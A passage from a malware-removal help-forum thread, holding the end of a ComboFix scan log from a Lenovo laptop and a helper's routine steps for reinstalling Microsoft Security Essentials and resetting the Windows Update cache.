S2 LENOVO.MICMUTE;Lenovo Microphone Mute;c:\program files\LENOVO\HOTKEY\MICMUTE.exe;c:\program files\LENOVO\HOTKEY\MICMUTE.exe [x]
S2 LENOVO.TPKNRSVC;Lenovo Keyboard Noise Reduction;c:\program files\Lenovo\Communications Utility\TPKNRSVC.exe;c:\program files\Lenovo\Communications Utility\TPKNRSVC.exe [x]
S2 LENOVO.TVTVCAM;Lenovo Virtual Camera Controller;c:\program files\Lenovo\Communications Utility\vcamsvc.exe;c:\program files\Lenovo\Communications Utility\vcamsvc.exe [x]
S2 Lenovo.VIRTSCRLSVC;Lenovo Auto Scroll;c:\program files\LENOVO\VIRTSCRL\lvvsst.exe;c:\program files\LENOVO\VIRTSCRL\lvvsst.exe [x]
S2 QBVSS;QBIDPService;c:\program files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe;c:\program files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe [x]
S2 risdxc;risdxc;c:\windows\system32\DRIVERS\risdxc64.sys;c:\windows\SYSNATIVE\DRIVERS\risdxc64.sys [x]
S2 smihlp;SMI Helper Driver (smihlp);c:\program files\ThinkVantage Fingerprint Software\smihlp.sys;c:\program files\ThinkVantage Fingerprint Software\smihlp.sys [x]
S2 TPHKLOAD;Lenovo Hotkey Client Loader;c:\program files\LENOVO\HOTKEY\TPHKLOAD.exe;c:\program files\LENOVO\HOTKEY\TPHKLOAD.exe [x]
S2 TPHKSVC;On Screen Display;c:\program files\LENOVO\HOTKEY\TPHKSVC.exe;c:\program files\LENOVO\HOTKEY\TPHKSVC.exe [x]
S2 UMVPFSrv;UMVPFSrv;c:\program files (x86)\Common Files\logishrd\LVMVFM\UMVPFSrv.exe;c:\program files (x86)\Common Files\logishrd\LVMVFM\UMVPFSrv.exe [x]
S2 VmbService;Vodafone Mobile Broadband Service;c:\program files (x86)\Vodafone\Vodafone Mobile Broadband\Bin\VmbService.exe;c:\program files (x86)\Vodafone\Vodafone Mobile Broadband\Bin\VmbService.exe [x]
S2 ZeroConfigService;Intel® PROSet/Wireless Zero Configuration Service;c:\program files\Intel\WiFi\bin\ZeroConfigService.exe;c:\program files\Intel\WiFi\bin\ZeroConfigService.exe [x]
S3 bcbtums;Bluetooth RAM Firmware Download USB Filter;c:\windows\system32\drivers\bcbtums.sys;c:\windows\SYSNATIVE\drivers\bcbtums.sys [x]
S3 btwampfl;btwampfl Bluetooth filter driver;c:\windows\system32\drivers\btwampfl.sys;c:\windows\SYSNATIVE\drivers\btwampfl.sys [x]
S3 btwl2cap;Bluetooth L2CAP Service;c:\windows\system32\DRIVERS\btwl2cap.sys;c:\windows\SYSNATIVE\DRIVERS\btwl2cap.sys [x]
S3 cbfs3;EldoS Callback File System driver v3;c:\windows\system32\DRIVERS\cbfs3.sys;c:\windows\SYSNATIVE\DRIVERS\cbfs3.sys [x]
S3 huawei_enumerator;huawei_enumerator;c:\windows\system32\DRIVERS\ew_jubusenum.sys;c:\windows\SYSNATIVE\DRIVERS\ew_jubusenum.sys [x]
S3 ICCS;Intel® Integrated Clock Controller Service - Intel® ICCS;c:\program files (x86)\Intel\Intel® Integrated Clock Controller Service\ICCProxy.exe;c:\program files (x86)\Intel\Intel® Integrated Clock Controller Service\ICCProxy.exe [x]
S3 IntcDAud;Intel® Display Audio;c:\windows\system32\DRIVERS\IntcDAud.sys;c:\windows\SYSNATIVE\DRIVERS\IntcDAud.sys [x]
S3 iusb3hub;Intel® USB 3.0 Hub Driver;c:\windows\system32\DRIVERS\iusb3hub.sys;c:\windows\SYSNATIVE\DRIVERS\iusb3hub.sys [x]
S3 iusb3xhc;Intel® USB 3.0 eXtensible Host Controller Driver;c:\windows\system32\DRIVERS\iusb3xhc.sys;c:\windows\SYSNATIVE\DRIVERS\iusb3xhc.sys [x]
S3 iwdbus;IWD Bus Enumerator;c:\windows\system32\DRIVERS\iwdbus.sys;c:\windows\SYSNATIVE\DRIVERS\iwdbus.sys [x]
S3 Power Manager DBC Service;Power Manager Service;c:\program files (x86)\ThinkPad\Utilities\PWMDBSVC.EXE;c:\program files (x86)\ThinkPad\Utilities\PWMDBSVC.EXE [x]
S3 RCUVCAVS;Ricoh UVC AVStream driver;c:\windows\system32\DRIVERS\RCUVCAVS.sys;c:\windows\SYSNATIVE\DRIVERS\RCUVCAVS.sys [x]
S3 SmbDrvI;SmbDrvI;c:\windows\system32\DRIVERS\Smb_driver_Intel.sys;c:\windows\SYSNATIVE\DRIVERS\Smb_driver_Intel.sys [x]
S3 usb3Hub;UoIP Hub;c:\windows\system32\DRIVERS\usb3Hub.sys;c:\windows\SYSNATIVE\DRIVERS\usb3Hub.sys [x]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - WS2IFSL
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\svchost]
iissvcs    REG_MULTI_SZ       w3svc was
apphost    REG_MULTI_SZ       apphostsvc
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2016-06-18 01:17    1245848    ----a-w-    c:\program files (x86)\Google\Chrome\Application\51.0.2704.103\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2016-07-06 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-05-24 08:40]
.
2016-07-06 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-05-31 01:46]
.
2016-07-06 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-05-31 01:46]
.
2016-07-06 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2572138134-34439291-2312372487-1000Core.job
- c:\users\User1\AppData\Local\Google\Update\GoogleUpdate.exe [2016-07-06 15:56]
.
2016-07-06 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2572138134-34439291-2312372487-1000UA.job
- c:\users\User1\AppData\Local\Google\Update\GoogleUpdate.exe [2016-07-06 15:56]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\EldosIconOverlay]
@="{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}"
[HKEY_CLASSES_ROOT\CLSID\{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}]
2012-04-09 22:27    190480    ----a-w-    c:\windows\System32\CbFsMntNtf3.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RTHDVCPL"="c:\program files\Realtek\Audio\HDA\RAVCpl64.exe" [2014-12-11 13776088]
"RtHDVBg_Dolby"="c:\program files\Realtek\Audio\HDA\RAVBg64.exe" [2014-12-11 1391472]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2013-11-29 165872]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2013-11-29 407536]
"Persistence"="c:\windows\system32\igfxpers.exe" [2013-11-29 444400]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2015-04-30 1337000]
"LENOVO.TPKNRRES"="c:\program files\Lenovo\Communications Utility\TPKNRRES.exe" [2014-08-07 295712]
"AcWin7Hlpr"="c:\program files (x86)\Lenovo\Access Connections\AcTBenabler.exe" [2015-06-08 63728]
"TpShocks"="TpShocks.exe" [2014-02-17 384344]
"PasswordManager"="c:\program files\Lenovo\Password Manager\password_manager.exe" [2014-06-24 1665824]
"RtHDVBg_LENOVO_MICPKEY"="c:\program files\Realtek\Audio\HDA\RAVBg64.exe" [2014-12-11 1391472]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2016-05-11 176952]
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
mLocal Page = c:\windows\SysWOW64\blank.htm
TCP: DhcpNameServer = 192.168.1.254
TCP: Interfaces\{043BE712-F8BC-4377-96FB-45DB49ECFB1D}: NameServer = 197.250.65.178 41.223.5.33
TCP: Interfaces\{29476DF9-6B52-48BF-9ABE-9D23CBBCCBDA}: NameServer = 197.250.65.178 41.223.5.33
TCP: Interfaces\{5F842A87-F1DD-44FE-99AE-8492F10299AD}: NameServer = 197.250.65.178 41.223.5.33
Handler: intu-help-qb9 - {C1252096-0E63-4C06-A38B-03DF9A16AA12} - c:\program files (x86)\Intuit\QuickBooks 2016\HelpAsyncPluggableProtocol.dll
FF - ProfilePath - c:\users\User1\AppData\Roaming\Mozilla\Firefox\Profiles\7nkpvw3l.default-1437326176257\
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_22_0_0_192_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_22_0_0_192_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_22_0_0_192_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_22_0_0_192_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_22_0_0_192.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.22"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_22_0_0_192.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_22_0_0_192.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_22_0_0_192.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]
@Denied: (A) (Everyone)
"Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B9A09F18-45AB-4F09-A117-A4ADDA8FA8C8}]
@Denied: (A) (Everyone)
"Solution"="{36eb6792-3a29-43b3-8cd0-f67d266fb426}"
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Schema Library\ActionsPane]
@Denied: (A) (Everyone)
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Schema Library\ActionsPane\0]
"Key"="ActionsPane"
"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\8.0\\ActionsPane.xsd"
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Schema Library\ActionsPane3]
@Denied: (A) (Everyone)
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]
"Key"="ActionsPane3"
"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0001\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0002\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2016-07-06  12:43:24
ComboFix-quarantined-files.txt  2016-07-06 17:43
ComboFix2.txt  2016-07-06 17:11
.
Pre-Run: 43,959,443,456 bytes free
Post-Run: 43,413,143,552 bytes free
.
- - End Of File - - 314140E0B8BEE737E276667F2B47A50E
 


  • 0

#12
zep516

zep516

    Trusted Helper

  • Malware Removal
  • 6,806 posts
Sorry for some delay no power for a day.

Lets uninstall Microsoft Security essentials through the uninstall list, Start > Control panel > programs an features.

Then

Run the clean up tool found at below link
https://www.techsupp...s-removal-tool/
Download an run it.

Then
Reinstall Microsoft security Essentials
https://www.microsof...ls.aspx?id=5201

Let me know how that goes and if it fixes anything.

Thanks
Joe :)
  • 0

#13
starsknight

starsknight

    Member

  • Topic Starter
  • Member
  • PipPip
  • 30 posts

Hi Joe,

 

Uninstalled just fine, but when I clicked the link on the first page you provided, I was directed to MS's general help page for "Easy Fix" rather than a specific download. Can you let me know what I should download and run?

 

Meantime, I tried to reinstall MSE just to tide things over while that gets sorted, but as it won't update, I can't activate live protection. Please advise.

 

Thanks,

Katherine


  • 0

#14
zep516

zep516

    Trusted Helper

  • Malware Removal
  • 6,806 posts
Ridiculous link sorry about that, didn't want the "fix it" tool wanted the clean up removal tool and here it is

http://www.bleepingc...s-removal-tool/

Download version 2 or higher, then you will need to reinstall it. I want to go through this process to make sure it's not some registry key issue.

So again uninstall it through the programs an features, then run the clean up tool and reinstall MSE.
  • 0

#15
zep516

zep516

    Trusted Helper

  • Malware Removal
  • 6,806 posts
Looks like I may lose power again here bad storms, so I'm posting the next steps for you.

If reinstalling and running the clean tool don't work,

Then

Open a command prompt as Administrator,

Click start in the search box type cmd in the list right click on cmd and choose "Run as Administrator"
At the command prompt C:\>_, type the following, commands one at a time and press Enter after each command.
net stop wuauserv
ren c:\windows\SoftwareDistribution softwaredistribution.old
net start wuauserv
Try to up date MSE.

If that fails above try resetting windows up date components by running the fixit for your operating system.
https://support.micr...s/kb/971058?p=1

Try MSE again.
  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP